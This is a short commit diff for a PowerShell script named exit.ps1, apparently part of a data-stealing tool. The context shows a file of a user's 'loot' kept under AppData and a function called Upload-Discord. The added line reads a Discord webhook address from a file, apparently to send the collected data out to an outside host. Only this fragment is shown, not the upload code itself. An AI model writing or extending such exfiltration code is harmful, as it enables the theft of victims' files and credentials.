Update exit.ps1
This commit is contained in:
parent
c3b01dfc48
commit
d42311b22c
1 changed files with 2 additions and 0 deletions
|
@ -3,6 +3,8 @@ Add-Type -AssemblyName PresentationCore,PresentationFramework
|
|||
|
||||
$Path="$env:appdata\-locker\$env:UserName-loot.txt"
|
||||
|
||||
$dc = (Get-Content "$env:appdata\-locker\wh.txt" -TotalCount 1)
|
||||
|
||||
function Upload-Discord {
|
||||
|
||||
[CmdletBinding()]
|
||||
|
|
Loading…
Reference in a new issue